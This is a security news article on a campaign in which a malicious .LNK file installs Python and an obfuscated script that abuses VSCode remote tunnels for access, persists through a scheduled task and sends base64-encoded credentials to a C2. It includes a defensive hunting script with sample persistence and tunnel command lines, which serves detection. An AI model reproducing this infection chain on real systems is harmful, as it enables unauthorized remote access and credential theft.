Hackers Turn Visual Studio Code Into a Remote Access Tool

The attackers use a malicious .LNK file to download an embeddable Python package, which runs an obfuscated script fetched from a paste site. The script establishes persistence through a scheduled task and checks whether VSCode is installed.

If it is not, the script downloads the VSCode CLI and uses it to open a remote tunnel, giving the attackers unauthorized access to the victim's machine. The same technique was used in earlier campaigns attributed to the Chinese APT group Stately Taurus.

Figure: Infection chain

Researchers discovered a malicious .LNK campaign that mimics installer behavior: the .LNK downloads python-3.12.5-embed-amd64.zip, extracts it to %LOCALAPPDATA%\Microsoft\Python, retrieves a malicious script, "update.py", from paste.ee and executes it silently with pythonw.exe (the windowless Python interpreter, so no console appears).

The update.py script checks for a VSCode installation and, if none is present, downloads the VSCode CLI from Microsoft, extracts it, and places "code.exe" in the VSCode program data directory.

The script then creates a scheduled task named "MicrosoftHealthcareMonitorNode" that re-runs "update.py" hidden via pythonw.exe. For non-admin users the task runs every 4 hours; for admin users it runs at logon with SYSTEM privileges. Either way the script survives reboots, and in the admin case it also gains elevated control of the host.

Figure: Scheduled task

On each run it checks whether VSCode is already running, terminates any existing remote session if necessary, and then starts a new VSCode process with "code.exe tunnel user login" to establish a fresh remote tunnel for future access to the victim's system. Because the tunnel is an outbound connection to Microsoft's legitimate tunnel service, it passes through most perimeter controls and looks like ordinary developer activity.

The attacker gathers victim system information (folder names, running processes) and sensitive data (language, location, credentials) and exfiltrates it to a C&C server via a POST request after base64-encoding it. Base64 is an encoding, not encryption, so the data is trivially recoverable from any captured request.
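A hunting check for the chain described above (the .LNK-dropped embeddable Python, update.py under pythonw.exe, the MicrosoftHealthcareMonitorNode task, the code.exe tunnel launch, and the base64-encoded POST), as an added example that is not Cyble's code or the malware's own: it runs the article's indicators over constructed Sysmon-style process records and one HTTP record. The record field names, the sample paths, the schtasks command line, and the 203.0.113.10 C2 address are assumptions made for the example.

```python
"""Hunt for the VSCode-tunnel infection chain in endpoint telemetry.

Added example, not Cyble's code or the malware itself. The indicators come from
the article: an embeddable Python under %LOCALAPPDATA%\\Microsoft\\Python,
update.py run by pythonw.exe, a scheduled task named MicrosoftHealthcareMonitorNode,
code.exe started in tunnel mode, and a base64-encoded POST to the C2.
The record layout and every sample record below are constructed, not real captures.
"""
import base64
import binascii
import re

TASK_NAME = "MicrosoftHealthcareMonitorNode"               # task name as reported
PYTHON_DROP_DIR = "\\appdata\\local\\microsoft\\python\\"  # %LOCALAPPDATA%\Microsoft\Python, lower-cased
TUNNEL_RE = re.compile(r"\btunnel\b", re.IGNORECASE)


def check_process_event(image, cmdline, parent_image=""):
    """Return the findings for one process-creation record (Sysmon EID 1 style fields)."""
    findings = []
    img, cmd, parent = image.lower(), cmdline.lower(), parent_image.lower()
    if img.endswith("pythonw.exe") and PYTHON_DROP_DIR in img:
        findings.append("pythonw.exe launched from %LOCALAPPDATA%\\Microsoft\\Python")
    if img.endswith("pythonw.exe") and "update.py" in cmd:
        findings.append("pythonw.exe executing update.py")
    if TASK_NAME.lower() in cmd:
        findings.append(f"command line references scheduled task '{TASK_NAME}'")
    if img.endswith("code.exe") and TUNNEL_RE.search(cmd):
        findings.append("VSCode CLI invoked in tunnel mode")
        if parent.endswith("pythonw.exe"):
            findings.append("tunnel started by a pythonw.exe parent")
    return findings


def decode_beacon_body(body):
    """Decode a POST body if it is valid base64 of readable text; return None otherwise."""
    try:
        raw = base64.b64decode(body, validate=True)
    except (binascii.Error, ValueError):
        return None
    try:
        text = raw.decode("utf-8")
    except UnicodeDecodeError:
        return None
    if text and all(ch.isprintable() or ch in "\r\n\t" for ch in text):
        return text
    return None


def hunt(events):
    """Run every record through the checks; return (event id, finding) pairs."""
    hits = []
    for ev in events:
        if ev["type"] == "process":
            for finding in check_process_event(ev["image"], ev["cmdline"], ev.get("parent", "")):
                hits.append((ev["id"], finding))
        elif ev["type"] == "http" and ev["method"] == "POST":
            text = decode_beacon_body(ev["body"])
            if text is not None:
                hits.append((ev["id"], "base64 POST body decodes to readable text: " + text[:60]))
    return hits


# Constructed telemetry: a benign logon, the chain from the article, a benign VSCode
# launch, and the beacon. 203.0.113.10 is a documentation address standing in for the C2.
SAMPLE_EVENTS = [
    {"id": 1, "type": "process", "image": r"C:\Windows\explorer.exe",
     "cmdline": "explorer.exe", "parent": r"C:\Windows\System32\userinit.exe"},
    {"id": 2, "type": "process",
     "image": r"C:\Users\alice\AppData\Local\Microsoft\Python\pythonw.exe",
     "cmdline": r'pythonw.exe "C:\Users\alice\AppData\Local\Microsoft\Python\update.py"',
     "parent": r"C:\Windows\System32\svchost.exe"},
    {"id": 3, "type": "process", "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": 'schtasks /create /tn MicrosoftHealthcareMonitorNode /tr "pythonw.exe update.py" /sc hourly /mo 4',
     "parent": r"C:\Users\alice\AppData\Local\Microsoft\Python\pythonw.exe"},
    {"id": 4, "type": "process", "image": r"C:\ProgramData\Microsoft\VSCode\code.exe",
     "cmdline": "code.exe tunnel user login",
     "parent": r"C:\Users\alice\AppData\Local\Microsoft\Python\pythonw.exe"},
    {"id": 5, "type": "process",
     "image": r"C:\Users\alice\AppData\Local\Programs\Microsoft VS Code\Code.exe",
     "cmdline": r'"Code.exe" C:\src\project', "parent": r"C:\Windows\explorer.exe"},
    {"id": 6, "type": "http", "method": "POST", "url": "http://203.0.113.10/api/upload",
     "body": base64.b64encode(b"host=WS01;user=alice;lang=en-US;procs=explorer.exe,Code.exe").decode()},
]

if __name__ == "__main__":
    for event_id, finding in hunt(SAMPLE_EVENTS):
        print(f"event {event_id}: {finding}")
```

In practice SAMPLE_EVENTS would be replaced by Sysmon or EDR process-creation records and proxy logs; the benign VSCode launch (event 5) is included so the tunnel check is seen to key on the "tunnel" argument, not on code.exe itself, and the POST check is deliberately loose because the interesting signal is a base64 body decoding to a host profile.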

Figure: POST request

The exfiltrated login code lets the attackers authenticate the tunnel through GitHub and gain unauthorized access to the victim's machine, where they can browse files, manipulate directories, and run terminal commands, potentially installing further malware.

According to Cyble, the campaign highlights how threat actors abuse legitimate tools such as VSCode to gain unauthorized access. By combining a .LNK file with an obfuscated Python script, they can evade detection and execute commands on victim systems, potentially leading to further compromise.

To enhance security, deploy endpoint protection with behavioral analysis and machine learning; regularly review scheduled tasks for unauthorized entries (in this campaign, a task named MicrosoftHealthcareMonitorNode running pythonw.exe from %LOCALAPPDATA%); educate users on file and link safety; restrict software installation permissions; deploy monitoring tools that surface unexpected code.exe tunnel launches; and audit system logs to identify and mitigate threats.

Kaaviya
Kaaviya is a Security Editor and fellow reporter with Cyber Press. She is covering various cyber security incidents happening in the Cyber Space.
